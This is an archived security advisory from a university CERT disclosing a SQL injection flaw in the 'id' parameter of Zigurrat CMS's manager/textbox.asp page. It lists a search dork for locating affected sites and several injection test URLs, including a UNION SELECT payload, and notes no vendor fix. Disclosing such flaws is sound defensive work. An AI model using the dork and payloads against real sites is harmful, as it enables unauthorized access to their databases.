TUCoPS :: Web :: CMS / Portals :: bu-2011.htm

Zigurrat CMS SQL Injection Vulnerability
Zigurrat CMS SQL Injection Vulnerability
Zigurrat CMS SQL Injection Vulnerability


================= IUT-CERT ==================0D
=0D
Title: Zigurrat CMS SQL Injection Vulnerability=0D
=0D
Vendor: www.farsi-cms.com=0D 
=0D
Dork: Design by Tagfa Co=0D
Type: Input.Validation.Vulnerability (SQL Injection)=0D
=0D
Fix: N/A=0D
=0D
================== nsec.ir ==================0D
=0D
Description:=0D
=0D
------------------=0D
=0D
Zigurrat CMS is a CMS producer in Iran. "manager/textbox.asp" pages in Pars CMS=0D
=0D
product are vulnerable to SQL Injection vulnerability.=0D
=0D
Vulnerability Variant:=0D
=0D
------------------=0D
Injection "manager/textbox.asp" in "id" parameter. =0D
=0D
http://www.example.com/manager/textbox.asp?id='=0D 
=0D
http://www.example.com/manager/textbox.asp?id=0'=0D 
=0D
http://www.example.com/manager/textbox.asp?id=%2527=0D 
=0D
http://www.example.com/manager/textbox.asp?id=\'=0D 
=0D
http://www.example.com/manager/textbox.asp?id= UNION SELECT *FROM VALIDTBLNAME'=0D 
=0D
Solution:=0D
=0D
------------------=0D
=0D
Input validation of Parameter "id" should be corrected.=0D
=0D
Credit:=0D
=0D
------------------=0D
=0D
Isfahan University of Technology - Computer Emergency Response Team=0D
=0D
Thanks to : M. Fereidounian, M. R. Faghani, N. Fathi,E. Jafari=0D

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH